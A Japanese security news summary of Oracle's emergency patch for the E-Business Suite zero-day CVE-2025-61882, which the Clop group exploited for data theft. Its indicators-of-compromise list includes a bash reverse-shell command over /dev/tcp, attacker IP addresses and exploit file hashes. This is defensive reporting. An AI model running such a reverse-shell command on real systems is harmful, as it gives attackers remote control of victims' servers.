Oracle EBSのゼロデイ脆弱性、Clopのデータ窃盗攻撃で悪用される

概要

Oracleは、E-Business Suite(EBS)の深刻なゼロデイ脆弱性「CVE-2025-61882」に対する緊急パッチを公開しました。この脆弱性は、認証なしでリモートコード実行を可能にするもので、悪名高いClopランサムウェアグループによるデータ窃盗攻撃で既に悪用されていたことが確認されています。

脆弱性の詳細

この脆弱性は、Oracle E-Business SuiteのOracle Concurrent Processing製品(コンポーネント:BI Publisher Integration)内に存在します。CVSSスコアは9.8と極めて高く、認証不要で容易に悪用できるため、深刻な脅威となります。Oracleの勧告によると、この脆弱性が悪用された場合、認証なしでリモートコード実行が可能となり、システムが完全に侵害される恐れがあります。影響を受けるバージョンは、Oracle E-Business Suite 12.2.3から12.2.14です。

Clopの攻撃と過去の事例

Clopランサムウェアグループは、2025年8月に発生した複数の企業に対するデータ窃盗攻撃で、このゼロデイ脆弱性を悪用しました。MandiantのCTOであるCharles Carmakal氏も、この事実を認めています。Clopは、Oracle EBSシステムから大量のデータを盗み出し、身代金を要求する脅迫メールを送付していました。

Clopはこれまでにも、数々のゼロデイ脆弱性を悪用して大規模なデータ窃盗攻撃を仕掛けてきた実績があります。

  • 2020年: Accellion FTAプラットフォームのゼロデイを悪用し、約100組織に影響。
  • 2021年: SolarWinds Serv-U FTPソフトウェアのゼロデイを悪用。
  • 2023年: GoAnywhere MFTプラットフォームのゼロデイを悪用し、100社以上が侵害。
  • 2023年: MOVEit Transferのゼロデイを悪用し、世界中の2,773組織からデータ窃盗。
  • 2024年: Cleoファイル転送の2つのゼロデイ(CVE-2024-50623およびCVE-2024-55956)を悪用。

エクスプロイトの流出とIOC

このゼロデイ脆弱性のエクスプロイトは、「Scattered Lapsus$ Hunters」と名乗る脅威アクターグループによってTelegram上で公開されました。Oracleは、このエクスプロイトがClopによって使用されたことを確認しており、以下の侵害の痕跡(IOC)を共有しています。

  • IPアドレス: 200.107.207.26, 185.181.60.11 (HTTP GETおよびPOSTリクエストに関連)
  • 実行コマンド: sh -c /bin/bash -i >& /dev/tcp// 0>&1 (リバースシェルを開くためのコマンド)
  • エクスプロイトアーカイブのSHA256ハッシュ: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)
  • エクスプロイトファイル(一部)のSHA256ハッシュ: aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py), 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)

Oracleの対応

Oracleは、この脆弱性に対処するための緊急アップデートをリリースしました。顧客は、この新しいセキュリティアップデートをインストールする前に、2023年10月のCritical Patch Updateを適用している必要があると警告しています。

結論

Oracle EBSを利用している組織は、直ちにシステムを評価し、提供されたパッチを適用することが極めて重要です。Clopのような高度な脅威アクターによるゼロデイ攻撃は、迅速な対応が求められる深刻なリスクをもたらします。


元記事: https://www.bleepingcomputer.com/news/security/oracle-patches-ebs-zero-day-exploited-in-clop-data-theft-attacks/